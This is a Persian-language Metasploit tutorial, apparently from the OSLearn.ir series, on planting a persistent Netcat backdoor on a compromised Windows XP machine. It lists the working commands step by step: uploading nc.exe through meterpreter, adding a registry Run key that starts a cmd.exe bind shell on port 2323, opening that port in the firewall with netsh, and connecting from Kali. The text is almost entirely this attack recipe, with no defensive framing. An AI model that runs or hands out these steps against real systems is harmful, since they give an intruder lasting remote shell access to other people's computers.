منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Persistent Netcat Backdoor – Win XP

سلام دوستان . قسمت چهاردهم از سری آموزش های متااسپلویت را در پیش رو داریم . همان طور که از عنوان مشخص است . امروز به ساخت یک backdoor در سیستم قربانی با استفاده از NC می پردازیم . روند کار به این صورت است که با استفاده از رجیستری NC را بر روی یک پورت به صورت listing در میاریم سپس از سیستم خودمون به تارگت متصل می شیم .

ابتدا توپولوژی زیر را فرض کنید :

OSLearn.ir_0

کار خودمون رو با فرض این که از سیستم قربانی دسترسی داریم شروع می کنیم . برای کار گذاشتن backdoor بر روی سیستم قربانی از ریجستری استفاده می کنیم . پس در اولین قدم برنامه ی net cat را بر روی سیستم قربانی آپلود می کنیم :

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32

حال nc را به شکل start up در سیستم فعال می کنیم :

meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32nc.exe -Ldp 2323 -e cmd.exe'

نکته : همان طور که مشاهده می کنید , پورت listing را بر روی 2323 گذاشتیم اما می توانید آن را تغییر دهید .

در‌ آخر برای مشاهده تغییرات انجام شده در ریجستری به شکل زیر عمل می کنیم :

meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc

OSLearn.ir_01

توجه : پورت listing را بر روی 2323 تنظیم کردیم . پس با فرض فعال بودن فایروال پیش فرض ویندوز , لازم است این پورت بر روی فایروال add شود . برای این منظور با استفاده از دستور shell در محیط meterpreter وارد محیط CMD سیستم قربانی می شویم و در نهایت پورت 2323 را به فایروال اضافه می کنیم :

C:Documents and SettingsAdministratorDesktopOSLearn>netsh firewall add portopening TCP 2323 "OSLearn" ENABLE ALL

برای مشاهده ی تغییرات از دستور netsh در محیط خط فرمان به شکل زیر استفاده می کنیم :

C:Documents and SettingsAdministratorDesktopOSLearn>netsh firewall show portopening

OSLearn.ir_02

در آخر برای اتصال به backdoor به شکل زیر عمل خواهیم کرد :

root@kali:~# nc -v 10.10.10.2 2323

OSLearn.ir_03

موفق و موید باشید .

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : , , , ,